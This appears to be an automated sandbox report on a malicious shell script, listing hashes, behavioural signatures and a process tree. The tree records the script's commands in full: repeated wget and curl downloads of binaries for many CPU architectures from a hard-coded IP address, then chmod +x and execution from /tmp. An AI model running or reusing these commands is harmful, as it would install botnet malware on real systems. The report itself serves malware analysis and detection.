Analysis
-
max time kernel
79s -
max time network
83s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/11/2024, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
-
Size
1KB
-
MD5
513641f5f60d55559c2060489de6d605
-
SHA1
c95feec2255732b60d434b0639b88a5cff205ea0
-
SHA256
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
-
SHA512
71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 836 chmod 842 chmod 740 chmod 752 chmod 769 chmod 848 chmod 854 chmod 860 chmod 723 chmod 734 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/3AvA 725 3AvA /tmp/3AvA 735 3AvA /tmp/3AvA 741 3AvA /tmp/3AvA 753 3AvA /tmp/3AvA 771 3AvA /tmp/3AvA 837 3AvA /tmp/3AvA 843 3AvA /tmp/3AvA 849 3AvA /tmp/3AvA 855 3AvA /tmp/3AvA 861 3AvA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 727 wget 730 curl 733 cat 735 3AvA -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3AvA 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Processes
-
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh1⤵
- Writes file to tmp directory
PID:699 -
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.x862⤵PID:705
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.x862⤵
- Reads runtime system information
PID:711
-
-
/bin/catcat UnHAnaAW.x862⤵PID:721
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:725
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:727
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:730
-
-
/bin/catcat UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:735
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵PID:737
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵
- Reads runtime system information
PID:738
-
-
/bin/catcat UnHAnaAW.mpsl2⤵PID:739
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm42⤵PID:743
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm42⤵
- Reads runtime system information
PID:744
-
-
/bin/catcat UnHAnaAW.arm42⤵PID:750
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:753
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm52⤵PID:758
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm52⤵
- Reads runtime system information
PID:761
-
-
/bin/catcat UnHAnaAW.arm52⤵PID:768
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:771
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm62⤵PID:773
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm62⤵
- Reads runtime system information
PID:834
-
-
/bin/catcat UnHAnaAW.arm62⤵PID:835
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:837
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm72⤵PID:839
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm72⤵
- Reads runtime system information
PID:840
-
-
/bin/catcat UnHAnaAW.arm72⤵PID:841
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:843
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.ppc2⤵PID:845
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.ppc2⤵
- Reads runtime system information
PID:846
-
-
/bin/catcat UnHAnaAW.ppc2⤵PID:847
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:849
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.m68k2⤵PID:851
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.m68k2⤵
- Reads runtime system information
PID:852
-
-
/bin/catcat UnHAnaAW.m68k2⤵PID:853
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:855
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.sh42⤵PID:857
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.sh42⤵
- Reads runtime system information
PID:858
-
-
/bin/catcat UnHAnaAW.sh42⤵PID:859
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:861
-